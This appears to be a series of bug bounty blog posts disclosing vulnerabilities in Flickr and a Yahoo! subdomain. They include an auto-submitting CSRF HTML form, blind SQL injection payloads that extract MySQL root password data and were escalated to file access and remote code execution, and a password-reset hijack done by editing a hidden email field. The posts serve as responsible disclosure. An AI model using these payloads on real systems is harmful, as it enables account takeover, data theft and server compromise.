Write what ever you want in others “Flickr” profile

Standard

Hello, Did you hear about testimonials feature in Flickr? .. mmmmm maybe 🙂

Overview:

Simply testimonials function give you ability to write testimonials/comments about Flickr user then he approve for displaying your testimonials in his profile page or he can delete it (In case he didn’t like it ^_^)

What we have here:

We have a CSRF vulnerability in  testimonials Approve/Delete actions. So the impact analysis here is an attacker can use CSRF vulnerability to approve and delete users testimonials because there is no “magic_cookie” which protect from CSRF in Flickr.

POC/Steps:

1. write a testimonial for any account from here “https://www.flickr.com/testimonials_write.gne?id=[UserID]” (Change [UserID] in the previous link to victim id)

2. The victim must approved for Testimonial before it displayed in his profile page. To make this action the following CSRF payload can do it.  (change the testimonial Id)

<html>
<body onload=”D1.submit();”>
<form id=”D1″ action=”https://www.flickr.com/testimonials_manage.gne” method=”POST”>
<input type=”hidden” name=”approve_72157648695059941″ value=”APPROVE” />
</form>
</body>
</html>

3. Send the payload to the victim when he open it just check his profile page you will find what you wrote in step 1.

4. To delete a testimonials … the following CSRF payload can do it. (change the testimonial Id):

<html>
<body onload=”D1.submit();”>
<form id=”D1″ action=”https://www.flickr.com/testimonials_manage.gne” method=”POST”>
<input type=”hidden” name=”delete_72157648695059941″ value=”DELETE” />
</form>
</body>
</html>


POC Video

Thanks,
Mohamed Maati
@MSM_1st
www.sculptordev.com

2nd BSQLI to RCE in Flickr Exploited by Sculptor Application

Standard

The following vulnerability is my second BSQLI => RCE in Flickr.

After discovering BSQLI in Flickr I said if I worked with my hand it will take along time to extract a good proof of concept [like root (DBA) password , tables ….. etc] . So I decided to add a new feature to Sculptor application [www.sculptordev.com] and the feature is Allow Cookies/Sessions …. which allows exploiting SQLI in the sites which requires logging/sessions.

So I wrote a code to allow cookies/sessions and the estimation time was less than manual exploit.

SculptorNew

To download a new release of Sculptor (V1.1) and more information: www.sculptordev.com


Here is the proof of concept video

Thanks,
Mohamed Maati
@MSM_1st
www.sculptordev.com

Great Update BSQLI Escalated to RCE in FLICKR

Standard
Today I talk about the best exploit for SQL injection vulnerability which I have found in Flickr. by the way there is another one ^_^.

Overview:

The impact analysis for this BSQLI is:
– Select from databases.
– Update and delete Tables.
– Get dba (root) password.
– Read and write files.
– Escalated to RCE.

Flickr give you ability to create a book, after you create a new book you can add “Front Cover Photo“. You can perform the following actions for cover photo:
– Change size
– Change position
– Zoom-in, Zoom-out
– Corp photo

All the above parameters affected for Blind SQL Injection

Let’s Start: 

1. Create new photo books, then edit it:

http://www.flickr.com/create/books/107355593/cover

2. Change cover photo position, zoom-in and zoom put (Just change photo settings) and capture the request.

3. Post request send to “http://api.flickr.com/services/rest” with the following data:

page_id=107355603_1&position=1&photo_id=13137498255&crop_x=12&crop_y=0&crop_w=76&crop_h=52

4. For above business, I put my analysis about what happen in the code.First I have update query (DML) which used to update photo settings like (crop, zoom-in and zoom-out) then I assumed that the query is:

UPDATE TblPhotosSettings SET position=’1′, crop_x=’12’, crop_y=’0′, crop_w=’76’, crop_h=’52’ WHERE page_id=’107355603_1′ and photo_id=13137498255

5. After playing with the request, I didn’t find any change in the response. Maybe no SQLI here. but I decide to have a look again. I said this is update query(DML) maybe the response doesn’t have any change let’s check the cover photo page “http://www.flickr.com/create/books/107355593/cover“.

6. I found that image position changed according what I wrote before. what should i do now !!?

7. I depended on y location (crop_y) to know if payload true or false.

  The following query return true:

page_id=107355603_1&position=1&photo_id=13137498255&crop_x=12&crop_y=0&crop_w=76&crop_h=52‘,crop_y=CASE WHEN 1=1 THEN ‘0’ ELSE ’50’ END,crop_w=’76

  The following query return false:

page_id=107355603_1&position=1&photo_id=13137498255&crop_x=12&crop_y=0&crop_w=76&crop_h=52‘,crop_y=CASE WHEN 1=0 THEN ‘0’ ELSE ’50’ END,crop_w=’76

If the Image “y” location changed to be 0 then the query return “true” else image “y” location changed to 50 and this mean the query return false.

2

Wow I got an idea to indicate the True and False by using special image 🙂

8. I used the following image to know if query return true or false and to make injection easy for me:

13137498255_888c02bcf7_b

9. Now I know that I have a real SQLI, So what I must do now let’s give Yahoo! proof of concept:

   To get length of database name: 

page_id=107355603_1&position=1&photo_id=13137498255&crop_x=12&crop_y=1&crop_w=76&crop_h=52‘,crop_y=CASE WHEN (SELECT length(database())) BETWEEN 12 and 17 THEN ‘0’ ELSE ’50’ END,crop_w=’76

10. After that, what the next to escalate your SQLI to give your self more privilege !!!?
    Yes, Your are right let’s check If MYSQL user is dba (root) or not.

 page_id=107355603_1&position=1&photo_id=13137498255&crop_x=12&crop_y=1&crop_w=76&crop_h=52‘,crop_y=CASE WHEN (SELECT length((SELECT username FROM mysql.user limit 0,1))) > 0 THEN ‘0’ ELSE ’50’ END,crop_w=’76

   Then got the password of root user:

page_id=107355603_1&position=1&photo_id=13137498255&crop_x=12&crop_y=1&crop_w=76&crop_h=52‘,crop_y=CASE WHEN ASCII(SUBSTRING((SELECT password FROM mysql.user limit 0,1),1,1)) > 60 THEN ‘0’ ELSE ’50’ END,crop_w=’76

11. Now by using above methodology, You can do what every you need, I started reading /etc/passwd then writing files in the server. I have full access to the server now 🙂

12. I escalated the BSQLI to RCE, I gave Yahoo! numbers of databases and tables which I have access to itroot(dba) username and password, 3 lines of /etc/passwd and created files in the temp folder as POC.

That was an amazing SQLI exploit which escalated to RCE for me in Flickr, after that I shocked when Yahoo! Committee team decide the minimum bounty (3000$) for SQLI that I have ever seen and the reason was this is the new process. I just need to add that I reported the vulnerability before the new process ^_^ 3 months ago. By the way thanks Yahoo! BB Team but it deserve at least x3 of current amount.

Note: Yahoo! paid $10000 for BSQLI to another guy and $15000 for SQLI to another guy too. But this one which is BSQLI like the first one $3000 only (I need to know the logic behind that).

3


Here is the proof of concept video

Thanks,
Mohamed Maati
@MSM_1st
www.sculptordev.com

How I can reset users password @ Yahoo! subdomain

Standard

And here is my first post about how I reset users password at Yahoo! subdomain.
http://arabeye.yahoo.com
is a Yahoo! Maktoob Research Community,
I decided to have a look at Forgetting Password functionality and see how it works in this site.

– First, You must enter a valid email address to verify yourself and the site will check if the email exists in the database, If yes, he will give you an option to send email, If the email not exists he will tell you “Invalid Email” (By the way this is a User enumeration/User harvesting).

Yahoo! ArabEye give you 2 method to reset your password:
1. Send reset link directly to my e-mail
2. Answer the two security questions

2
I started with the second method which “Answer the two security questions” but I failed to bypass it 🙁

4

So back to the first method which “Send reset link directly to my e-mail” After checking the form and the header POST data I found hidden field with the following name ” where_email ” and this field contains user email which I entered in the previous step ^_^ I told my self is this right ( the developer save the email in hidden field then he send the reset password link to this email ) :O, That’s true.

3

So what I should do now !? you are right man ^_^  …. just edit the request and change the victim email address to attacker email address on “where_email” parameter.
After 2 minutes I found reset password link in the attacker email inbox. My feeling was like (Edeloo Edy)

5


Here is the proof of concept video

Thanks,
Mohamed Maati
@MSM_1st